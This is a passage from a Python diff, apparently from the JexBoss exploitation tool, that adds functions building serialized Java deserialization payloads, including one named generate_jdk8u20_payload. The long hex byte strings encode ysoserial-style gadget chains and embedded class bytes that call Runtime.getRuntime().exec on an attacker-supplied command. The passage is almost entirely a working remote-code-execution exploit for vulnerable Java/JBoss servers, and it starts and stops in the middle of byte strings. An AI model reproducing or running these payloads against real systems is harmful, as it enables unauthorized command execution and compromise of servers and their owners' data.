+\x00\x42\x5B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\ +\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\ +\x65\x72\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x01\x00\x0A\x45\ +\x78\x63\x65\x70\x74\x69\x6F\x6E\x73\x07\x00\x27\x01\x00\xA6\x28\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\ +\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\ +\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x44\x4F\x4D\x3B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\ +\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x64\x74\ +\x6D\x2F\x44\x54\x4D\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6F\x72\x3B\x4C\x63\x6F\x6D\x2F\x73\ +\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\ +\x61\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x74\ +\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61\x74\x6F\x72\ +\x01\x00\x35\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\ +\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x64\x74\x6D\x2F\x44\x54\x4D\x41\x78\x69\x73\x49\ +\x74\x65\x72\x61\x74\x6F\x72\x3B\x01\x00\x07\x68\x61\x6E\x64\x6C\x65\x72\x01\x00\x41\x4C\x63\x6F\ +\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\ +\x65\x72\x6E\x61\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\x65\x72\x69\x61\x6C\x69\ +\x7A\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x01\x00\x0A\x53\x6F\x75\x72\x63\x65\x46\ +\x69\x6C\x65\x01\x00\x0C\x47\x61\x64\x67\x65\x74\x73\x2E\x6A\x61\x76\x61\x0C\x00\x0A\x00\x0B\x07\ +\x00\x28\x01\x00\x33\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\x79\x6C\x6F\x61\x64\x73\x2F\ +\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6E\x73\x6C\x65\ +\x74\x50\x61\x79\x6C\x6F\x61\x64\x01\x00\x40\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\ +\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\ +\x74\x63\x2F\x72\x75\x6E\x74\x69\x6D\x65\x2F\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72\x61\x6E\x73\ +\x6C\x65\x74\x01\x00\x14\x6A\x61\x76\x61\x2F\x69\x6F\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x62\ +\x6C\x65\x01\x00\x39\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\ +\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x54\x72\x61\ +\x6E\x73\x6C\x65\x74\x45\x78\x63\x65\x70\x74\x69\x6F\x6E\x01\x00\x1F\x79\x73\x6F\x73\x65\x72\x69\ +\x61\x6C\x2F\x70\x61\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\ +\x01\x00\x08\x3C\x63\x6C\x69\x6E\x69\x74\x3E\x01\x00\x11\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\ +\x52\x75\x6E\x74\x69\x6D\x65\x07\x00\x2A\x01\x00\x0A\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x01\ +\x00\x15\x28\x29\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x52\x75\x6E\x74\x69\x6D\x65\x3B\x0C\ +\x00\x2C\x00\x2D\x0A\x00\x2B\x00\x2E\x01\x00") + if version_info[0] >= 3: + payload += (bytes(chr(len(cmd)), 'utf-8')) + payload += (bytes(cmd, 'utf-8')) + else: + payload += (chr(len(cmd))) + payload += (cmd) + payload += (b"\x08\x00\x30\x01\x00\x04\ +\x65\x78\x65\x63\x01\x00\x27\x28\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\ +\x67\x3B\x29\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x50\x72\x6F\x63\x65\x73\x73\x3B\x0C\x00\ +\x32\x00\x33\x0A\x00\x2B\x00\x34\x01\x00\x21\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x4A\x65\x78\ +\x42\x6F\x73\x73\x32\x36\x31\x34\x31\x39\x33\x31\x34\x30\x38\x37\x38\x37\x35\x39\x01\x00\x23\x4C\ +\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x4A\x65\x78\x42\x6F\x73\x73\x32\x36\x31\x34\x31\x39\x33\ +\x31\x34\x30\x38\x37\x38\x37\x35\x39\x3B\x00\x21\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1A\ +\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x04\x00\x01\x00\x0A\x00\x0B\x00\x01\ +\x00\x0C\x00\x00\x00\x2F\x00\x01\x00\x01\x00\x00\x00\x05\x2A\xB7\x00\x01\xB1\x00\x00\x00\x02\x00\ +\x0D\x00\x00\x00\x06\x00\x01\x00\x00\x00\x2E\x00\x0E\x00\x00\x00\x0C\x00\x01\x00\x00\x00\x05\x00\ +\x0F\x00\x37\x00\x00\x00\x01\x00\x13\x00\x14\x00\x02\x00\x0C\x00\x00\x00\x3F\x00\x00\x00\x03\x00\ +\x00\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\x00\x00\x06\x00\x01\x00\x00\x00\x33\x00\x0E\x00\x00\ +\x00\x20\x00\x03\x00\x00\x00\x01\x00\x0F\x00\x37\x00\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\ +\x00\x00\x00\x01\x00\x17\x00\x18\x00\x02\x00\x19\x00\x00\x00\x04\x00\x01\x00\x1A\x00\x01\x00\x13\ +\x00\x1B\x00\x02\x00\x0C\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00\x00\x01\xB1\x00\x00\x00\x02\x00\ +\x0D\x00\x00\x00\x06\x00\x01\x00\x00\x00\x37\x00\x0E\x00\x00\x00\x2A\x00\x04\x00\x00\x00\x01\x00\ +\x0F\x00\x37\x00\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01\x00\x1C\x00\x1D\x00\ +\x02\x00\x00\x00\x01\x00\x1E\x00\x1F\x00\x03\x00\x19\x00\x00\x00\x04\x00\x01\x00\x1A\x00\x08\x00\ +\x29\x00\x0B\x00\x01\x00\x0C\x00\x00\x00\x1B\x00\x03\x00\x02\x00\x00\x00\x0F\xA7\x00\x03\x01\x4C\ +\xB8\x00\x2F\x12\x31\xB6\x00\x35\x57\xB1\x00\x00\x00\x00\x00\x02\x00\x20\x00\x00\x00\x02\x00\x21\ +\x00\x11\x00\x00\x00\x0A\x00\x01\x00\x02\x00\x23\x00\x10\x00\x09\x75\x71\x00\x7E\x00\x0C\x00\x00\ +\x01\xD4\xCA\xFE\xBA\xBE\x00\x00\x00\x31\x00\x1B\x0A\x00\x03\x00\x15\x07\x00\x17\x07\x00\x18\x07\ +\x00\x19\x01\x00\x10\x73\x65\x72\x69\x61\x6C\x56\x65\x72\x73\x69\x6F\x6E\x55\x49\x44\x01\x00\x01\ +\x4A\x01\x00\x0D\x43\x6F\x6E\x73\x74\x61\x6E\x74\x56\x61\x6C\x75\x65\x05\x71\xE6\x69\xEE\x3C\x6D\ +\x47\x18\x01\x00\x06\x3C\x69\x6E\x69\x74\x3E\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6F\x64\x65\ +\x01\x00\x0F\x4C\x69\x6E\x65\x4E\x75\x6D\x62\x65\x72\x54\x61\x62\x6C\x65\x01\x00\x12\x4C\x6F\x63\ +\x61\x6C\x56\x61\x72\x69\x61\x62\x6C\x65\x54\x61\x62\x6C\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\ +\x03\x46\x6F\x6F\x01\x00\x0C\x49\x6E\x6E\x65\x72\x43\x6C\x61\x73\x73\x65\x73\x01\x00\x25\x4C\x79\ +\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\ +\x61\x64\x67\x65\x74\x73\x24\x46\x6F\x6F\x3B\x01\x00\x0A\x53\x6F\x75\x72\x63\x65\x46\x69\x6C\x65\ +\x01\x00\x0C\x47\x61\x64\x67\x65\x74\x73\x2E\x6A\x61\x76\x61\x0C\x00\x0A\x00\x0B\x07\x00\x1A\x01\ +\x00\x23\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\ +\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6F\x6F\x01\x00\x10\x6A\x61\x76\x61\x2F\x6C\x61\x6E\ +\x67\x2F\x4F\x62\x6A\x65\x63\x74\x01\x00\x14\x6A\x61\x76\x61\x2F\x69\x6F\x2F\x53\x65\x72\x69\x61\ +\x6C\x69\x7A\x61\x62\x6C\x65\x01\x00\x1F\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\x79\x6C\ +\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x00\x21\x00\x02\x00\x03\x00\ +\x01\x00\x04\x00\x01\x00\x1A\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x01\x00\ +\x01\x00\x0A\x00\x0B\x00\x01\x00\x0C\x00\x00\x00\x2F\x00\x01\x00\x01\x00\x00\x00\x05\x2A\xB7\x00\ +\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\x00\x00\x06\x00\x01\x00\x00\x00\x3B\x00\x0E\x00\x00\x00\x0C\ +\x00\x01\x00\x00\x00\x05\x00\x0F\x00\x12\x00\x00\x00\x02\x00\x13\x00\x00\x00\x02\x00\x14\x00\x11\ +\x00\x00\x00\x0A\x00\x01\x00\x02\x00\x16\x00\x10\x00\x09\x70\x74\x00\x07\x6A\x65\x78\x62\x6F\x73\ +\x73\x70\x77\x01\x00\x78\x73\x7D\x00\x00\x00\x01\x00\x1D\x6A\x61\x76\x61\x78\x2E\x78\x6D\x6C\x2E\ +\x74\x72\x61\x6E\x73\x66\x6F\x72\x6D\x2E\x54\x65\x6D\x70\x6C\x61\x74\x65\x73\x78\x72\x00\x17\x6A\ +\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\x50\x72\x6F\x78\x79\xE1\x27\ +\xDA\x20\xCC\x10\x43\xCB\x02\x00\x01\x4C\x00\x01\x68\x74\x00\x25\x4C\x6A\x61\x76\x61\x2F\x6C\x61\ +\x6E\x67\x2F\x72\x65\x66\x6C\x65\x63\x74\x2F\x49\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\ +\x64\x6C\x65\x72\x3B\x78\x70\x73\x72\x00\x32\x73\x75\x6E\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\x61\ +\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x2E\x41\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x49\x6E\x76\x6F\ +\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x55\xCA\xF5\x0F\x15\xCB\x7E\xA5\x02\x00\x02\ +\x4C\x00\x0C\x6D\x65\x6D\x62\x65\x72\x56\x61\x6C\x75\x65\x73\x74\x00\x0F\x4C\x6A\x61\x76\x61\x2F\ +\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B\x4C\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4C\x6A\x61\x76\x61\ +\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x78\x70\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\ +\x74\x69\x6C\x2E\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00\x02\x46\x00\ +\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\ +\x70\x3F\x40\x00\x00\x00\x00\x00\x0C\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x74\x00\x08\x66\x35\ +\x61\x35\x61\x36\x30\x38\x71\x00\x7E\x00\x09\x78\x76\x72\x00\x1D\x6A\x61\x76\x61\x78\x2E\x78\x6D\ +\x6C\x2E\x74\x72\x61\x6E\x73\x66\x6F\x72\x6D\x2E\x54\x65\x6D\x70\x6C\x61\x74\x65\x73\x00\x00\x00\ +\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x78") + return payload + + +def generate_jdk8u20_payload(cmd): + # improved from Alvaro (pwntester) version + payload = (b"\xAC\xED\x00\x05\x73\x72\x00\x17\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x4C\x69\x6E\x6B\x65\ +\x64\x48\x61\x73\x68\x53\x65\x74\xD8\x6C\xD7\x5A\x95\xDD\x2A\x1E\x02\x00\x00\x78\x72\x00\x11\x6A\ +\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\ +\x03\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x10\x3F\x40\x00\x00\x00\x00\x00\x02\x73\x72\x00\x3A\x63\ +\x6F\x6D\x2E\x73\x75\x6E\x2E\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x78\x61\x6C\x61\x6E\x2E\ +\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2E\x78\x73\x6C\x74\x63\x2E\x74\x72\x61\x78\x2E\x54\x65\x6D\x70\ +\x6C\x61\x74\x65\x73\x49\x6D\x70\x6C\x09\x57\x4F\xC1\x6E\xAC\xAB\x33\x03\x00\x09\x49\x00\x0D\x5F\ +\x69\x6E\x64\x65\x6E\x74\x4E\x75\x6D\x62\x65\x72\x49\x00\x0E\x5F\x74\x72\x61\x6E\x73\x6C\x65\x74\ +\x49\x6E\x64\x65\x78\x5A\x00\x15\x5F\x75\x73\x65\x53\x65\x72\x76\x69\x63\x65\x73\x4D\x65\x63\x68\ +\x61\x6E\x69\x73\x6D\x4C\x00\x19\x5F\x61\x63\x63\x65\x73\x73\x45\x78\x74\x65\x72\x6E\x61\x6C\x53\ +\x74\x79\x6C\x65\x73\x68\x65\x65\x74\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\ +\x74\x72\x69\x6E\x67\x3B\x4C\x00\x0B\x5F\x61\x75\x78\x43\x6C\x61\x73\x73\x65\x73\x74\x00\x3B\x4C\ +\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\ +\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x72\x75\x6E\x74\x69\x6D\x65\x2F\ +\x48\x61\x73\x68\x74\x61\x62\x6C\x65\x3B\x5B\x00\x0A\x5F\x62\x79\x74\x65\x63\x6F\x64\x65\x73\x74\ +\x00\x03\x5B\x5B\x42\x5B\x00\x06\x5F\x63\x6C\x61\x73\x73\x74\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2F\ +\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x4C\x00\x05\x5F\x6E\x61\x6D\x65\x71\x00\x7E\x00\x05\ +\x4C\x00\x11\x5F\x6F\x75\x74\x70\x75\x74\x50\x72\x6F\x70\x65\x72\x74\x69\x65\x73\x74\x00\x16\x4C\ +\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x50\x72\x6F\x70\x65\x72\x74\x69\x65\x73\x3B\x78\x70\x00\ +\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x74\x00\x03\x61\x6C\x6C\x70\x75\x72\x00\x03\x5B\x5B\x42\x4B\xFD\ +\x19\x15\x67\x67\xDB\x37\x02\x00\x00\x78\x70\x00\x00\x00\x02\x75\x72\x00\x02\x5B\x42\xAC\xF3\x17\ +\xF8\x06\x08\x54\xE0\x02\x00\x00\x78\x70\x00\x00\x06") + if version_info[0] >= 3: + payload += (bytes(chr(len(cmd)+147), 'utf-8')) + else: + payload += (chr(len(cmd)+147)) + payload += (b"\xCA\xFE\xBA\xBE\x00\x00\x00\x31\x00\x3A\ +\x0A\x00\x03\x00\x24\x07\x00\x38\x07\x00\x27\x07\x00\x28\x01\x00\x10\x73\x65\x72\x69\x61\x6C\x56\ +\x65\x72\x73\x69\x6F\x6E\x55\x49\x44\x01\x00\x01\x4A\x01\x00\x0D\x43\x6F\x6E\x73\x74\x61\x6E\x74\ +\x56\x61\x6C\x75\x65\x05\xAD\x20\x93\xF3\x91\xDD\xEF\x3E\x01\x00\x06\x3C\x69\x6E\x69\x74\x3E\x01\ +\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6F\x64\x65\x01\x00\x0F\x4C\x69\x6E\x65\x4E\x75\x6D\x62\x65\ +\x72\x54\x61\x62\x6C\x65\x01\x00\x12\x4C\x6F\x63\x61\x6C\x56\x61\x72\x69\x61\x62\x6C\x65\x54\x61\ +\x62\x6C\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x13\x53\x74\x75\x62\x54\x72\x61\x6E\x73\x6C\x65\ +\x74\x50\x61\x79\x6C\x6F\x61\x64\x01\x00\x0C\x49\x6E\x6E\x65\x72\x43\x6C\x61\x73\x73\x65\x73\x01\ +\x00\x22\x4C\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6E\ +\x73\x6C\x65\x74\x50\x61\x79\x6C\x6F\x61\x64\x3B\x01\x00\x09\x74\x72\x61\x6E\x73\x66\x6F\x72\x6D\ +\x01\x00\x72\x28\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\ +\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x44\x4F\x4D\ +\x3B\x5B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\ +\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\x65\ +\x72\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x29\x56\x01\x00\x08\ +\x64\x6F\x63\x75\x6D\x65\x6E\x74\x01\x00\x2D\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\ +\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\ +\x6C\x74\x63\x2F\x44\x4F\x4D\x3B\x01\x00\x08\x68\x61\x6E\x64\x6C\x65\x72\x73\x01\x00\x42\x5B\x4C\ +\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\ +\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\x65\x72\x69\x61\ +\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x01\x00\x0A\x45\x78\x63\x65\x70\ +\x74\x69\x6F\x6E\x73\x07\x00\x29\x01\x00\xA6\x28\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\ +\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\ +\x73\x6C\x74\x63\x2F\x44\x4F\x4D\x3B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\ +\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x64\x74\x6D\x2F\x44\x54\ +\x4D\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6F\x72\x3B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\ +\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\ +\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\ +\x61\x6E\x64\x6C\x65\x72\x3B\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61\x74\x6F\x72\x01\x00\x35\x4C\ +\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\ +\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x64\x74\x6D\x2F\x44\x54\x4D\x41\x78\x69\x73\x49\x74\x65\x72\x61\ +\x74\x6F\x72\x3B\x01\x00\x07\x68\x61\x6E\x64\x6C\x65\x72\x01\x00\x41\x4C\x63\x6F\x6D\x2F\x73\x75\ +\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\ +\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x74\x69\ +\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x01\x00\x23\x6F\x72\x67\x2E\x6E\x65\x74\x62\x65\x61\x6E\ +\x73\x2E\x53\x6F\x75\x72\x63\x65\x4C\x65\x76\x65\x6C\x41\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x73\ +\x01\x00\x14\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x76\x65\x72\x72\x69\x64\x65\x3B\x01\ +\x00\x0A\x53\x6F\x75\x72\x63\x65\x46\x69\x6C\x65\x01\x00\x0C\x47\x61\x64\x67\x65\x74\x73\x2E\x6A\ +\x61\x76\x61\x0C\x00\x0A\x00\x0B\x07\x00\x2A\x01\x00\x20\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\ +\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6E\x73\x6C\x65\x74\x50\x61\x79\x6C\x6F\x61\x64\x01\x00\ +\x40\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\ +\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x72\x75\x6E\x74\x69\x6D\x65\ +\x2F\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72\x61\x6E\x73\x6C\x65\x74\x01\x00\x14\x6A\x61\x76\x61\ +\x2F\x69\x6F\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x62\x6C\x65\x01\x00\x39\x63\x6F\x6D\x2F\x73\ +\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\ +\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x54\x72\x61\x6E\x73\x6C\x65\x74\x45\x78\x63\x65\x70\ +\x74\x69\x6F\x6E\x01\x00\x0C\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x01\x00\x08\x3C\x63\ +\x6C\x69\x6E\x69\x74\x3E\x01\x00\x11\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x52\x75\x6E\x74\x69\ +\x6D\x65\x07\x00\x2C\x01\x00\x0A\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x01\x00\x15\x28\x29\x4C\ +\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x52\x75\x6E\x74\x69\x6D\x65\x3B\x0C\x00\x2E\x00\x2F\x0A\ +\x00\x2D\x00\x30\x01\x00") + if version_info[0] >= 3: + payload += (bytes(chr(len(cmd)), 'utf-8')) + payload += (bytes(cmd, 'utf-8')) + else: + payload += (chr(len(cmd))) + payload += (cmd) + payload += (b"\x08\x00\x32\x01\x00\x04\x65\x78\x65\x63\x01\x00\x27\x28\x4C\x6A\x61\ +\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x29\x4C\x6A\x61\x76\x61\x2F\x6C\x61\ +\x6E\x67\x2F\x50\x72\x6F\x63\x65\x73\x73\x3B\x0C\x00\x34\x00\x35\x0A\x00\x2D\x00\x36\x01\x00\x21\ +\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x4A\x65\x78\x42\x6F\x73\x73\x32\x34\x34\x39\x35\x35\x33\ +\x38\x34\x30\x35\x36\x33\x33\x37\x38\x01\x00\x23\x4C\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x4A\ +\x65\x78\x42\x6F\x73\x73\x32\x34\x34\x39\x35\x35\x33\x38\x34\x30\x35\x36\x33\x33\x37\x38\x3B\x00\ +\x21\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1A\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\ +\x02\x00\x08\x00\x04\x00\x01\x00\x0A\x00\x0B\x00\x01\x00\x0C\x00\x00\x00\x2F\x00\x01\x00\x01\x00\ +\x00\x00\x05\x2A\xB7\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\x00\x00\x06\x00\x01\x00\x00\x00\x1C\ +\x00\x0E\x00\x00\x00\x0C\x00\x01\x00\x00\x00\x05\x00\x0F\x00\x39\x00\x00\x00\x01\x00\x13\x00\x14\ +\x00\x02\x00\x0C\x00\x00\x00\x3F\x00\x00\x00\x03\x00\x00\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\ +\x00\x00\x06\x00\x01\x00\x00\x00\x1F\x00\x0E\x00\x00\x00\x20\x00\x03\x00\x00\x00\x01\x00\x0F\x00\ +\x39\x00\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01\x00\x17\x00\x18\x00\x02\x00\ +\x19\x00\x00\x00\x04\x00\x01\x00\x1A\x00\x01\x00\x13\x00\x1B\x00\x03\x00\x0C\x00\x00\x00\x49\x00\ +\x00\x00\x04\x00\x00\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\x00\x00\x06\x00\x01\x00\x00\x00\x22\ +\x00\x0E\x00\x00\x00\x2A\x00\x04\x00\x00\x00\x01\x00\x0F\x00\x39\x00\x00\x00\x00\x00\x01\x00\x15\ +\x00\x16\x00\x01\x00\x00\x00\x01\x00\x1C\x00\x1D\x00\x02\x00\x00\x00\x01\x00\x1E\x00\x1F\x00\x03\ +\x00\x19\x00\x00\x00\x04\x00\x01\x00\x1A\x00\x20\x00\x00\x00\x06\x00\x01\x00\x21\x00\x00\x00\x08\ +\x00\x2B\x00\x0B\x00\x01\x00\x0C\x00\x00\x00\x1B\x00\x03\x00\x02\x00\x00\x00\x0F\xA7\x00\x03\x01\ +\x4C\xB8\x00\x31\x12\x33\xB6\x00\x37\x57\xB1\x00\x00\x00\x00\x00\x02\x00\x22\x00\x00\x00\x02\x00\ 